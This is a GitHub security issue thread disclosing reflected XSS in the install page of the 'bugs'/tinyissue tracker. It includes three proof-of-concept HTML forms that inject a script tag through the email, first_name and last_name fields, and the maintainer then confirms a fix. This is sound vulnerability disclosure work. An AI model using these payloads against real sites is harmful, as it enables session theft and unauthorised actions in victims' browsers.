### ISSUE TITLE
[Security] multiple XSS in install/index.php of bugs and tinyissue

### ISSUE THREAD

**Issue by seongil-wi** [pixeline/bugs#552]
**Describe the bug**
Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.

**To Reproduce**

1. Go to the installation page
2. Complete the configuration including DB connection
3. Access each page of these HTML files.
#### Exploit 1 - exploit `email` parameter
```HTML
<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name="email" value='test"/><script>alert(1)</script>'>
  <button>Send my greetings</button>
</form>
</html>
```
#### Exploit 2 - exploit `first_name` parameter
```HTML
<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name='first_name' value='test"/><script>alert(1)</script>'>
   <input name='email' value='hi'>
  <button>Send my greetings</button>
</form>
</html>
```
#### Exploit 3 - exploit `last_name` parameter
```HTML
<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name='last_name' value='test"/><script>alert(1)</script>'>
   <input name='email' value='hi'>
  <button>Send my greetings</button>
</form>
</html>
```
 4. Boom!

**Screenshots**

- Attack result
![캡처](https://user-images.githubusercontent.com/26154873/132655605-278db108-dab4-48cf-995f-f866ca46972d.PNG)

**Where the Issue Occurred**
The code below displays the user-controlled parameter `first_name`, `last_name`, and `email` without sufficient sanitization:
https://github.com/pixeline/bugs/blob/f38ddb42dd89a643bd5c3f466ec9ca22cf2a9e86/install/index.php#L94
https://github.com/pixeline/bugs/blob/f38ddb42dd89a643bd5c3f466ec9ca22cf2a9e86/install/index.php#L101
https://github.com/pixeline/bugs/blob/f38ddb42dd89a643bd5c3f466ec9ca22cf2a9e86/install/index.php#L120

**Comment by Patriboom** [comment]
Thanks for that.
You trick works only if BUGS is not installed.
When installed, BUGS/install/index.php returns the following:

![image](https://user-images.githubusercontent.com/19801202/132677515-49b66d45-a47f-4ef5-ad25-7ad0d18ff1b6.png)

**Comment by seongil-wi** [comment]
Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities. 
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.

**Comment by Patriboom** [comment]
Install process updated.
Thanks
